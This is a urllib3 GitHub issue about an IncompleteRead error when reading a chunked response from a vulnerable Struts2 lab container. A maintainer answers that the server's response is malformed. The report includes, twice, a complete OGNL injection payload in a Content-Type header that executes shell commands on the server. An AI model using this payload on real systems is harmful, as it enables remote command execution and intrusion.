### ISSUE TITLE
http.client.IncompleteRead: IncompleteRead(0 bytes read)

### ISSUE THREAD

**Issue by boy-hack** [urllib3/urllib3#1874]
related https://github.com/urllib3/urllib3/pull/1873
My recurring environment is
```
docker pull medicean/vulapps:s_struts2_s2-032
docker run -d -p 8080:8080 medicean/vulapps:s_struts2_s2-032
```

```python
import urllib3

http = urllib3.PoolManager()
r = http.request('POST', 'http://127.0.0.1:8080', headers={
    "Content-Type": "hah-multipart/form-data %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls -alh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"})
print(r.data)
```
It will raise 
```python
Traceback (most recent call last):
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/http/client.py", line 554, in _get_chunk_left
    chunk_left = self._read_next_chunk_size()
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/http/client.py", line 521, in _read_next_chunk_size
    return int(line, 16)
ValueError: invalid literal for int() with base 16: b''

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/http/client.py", line 571, in _readall_chunked
    chunk_left = self._get_chunk_left()
  File "/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/http/client.py", line 556, in _get_chunk_left
    raise IncompleteRead(b'')
http.client.IncompleteRead: IncompleteRead(0 bytes read)
```

Using a socket request, it will return the following
```python
import socket

p = b'''GET / HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: hah-multipart/form-data %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls -alh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}


'''.replace(b'\n', b'\r\n')

with socket.create_connection(('127.0.0.1', '8080'), timeout=5) as conn:
    conn.send(p)
    print(conn.recv(10240))
```
it return
```
b'HTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\nTransfer-Encoding: chunked\r\nDate: Tue, 12 May 2020 03:39:06 GMT\r\nConnection: close\r\n\r\n9a\r\ntotal 12K\ndrwxrwxrwt 1 root root 4.0K Jul  8  2016 .\ndrwxr-xr-x 1 root root 4.0K May 11 08:36 ..\ndrwxr-xr-x 1 root root 4.0K May 11 08:36 hsperfdata_root\n\r\n'
```
It could be an error caused by urllib3's processing of the last `\n\r\n` character.

**Comment by hodbn** [comment]
Hi,

Your server sent an invalid response that should fail parsing.
[RFC states](https://tools.ietf.org/html/rfc7230#section-4.1):

> The chunked transfer coding is complete
>    when a chunk with a chunk-size of zero is received, possibly followed
>    by a trailer, and finally terminated by an empty line.

and your response is missing that last, terminating chunk.
